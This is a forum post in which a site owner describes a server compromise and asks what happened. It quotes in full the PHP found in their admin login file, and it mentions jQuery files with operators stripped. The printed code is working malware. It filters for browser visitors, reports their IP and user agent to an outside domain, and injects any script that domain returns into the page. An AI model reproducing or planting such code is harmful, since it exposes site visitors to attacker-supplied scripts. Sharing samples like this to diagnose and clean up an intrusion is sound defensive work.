I discovered that on Dec 25th and on Jan 4th some files where changed on a server account, I found the following code added to the file that is used to login to an admin side of an admin account:
Code: Select all
<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>I also seen that several jquery files where altered, they seemed to have all the '+' operators removed, this would just break the code, just didn't seem to make any logical sense.
This account has no other access apart from myself so it's not as if someone else could have done this without gaining access to the account, password has been changed but does anyone have any idea as to what might have been going on?
p.s. Needless to say the files have been replaced, removed and the password changed on the server.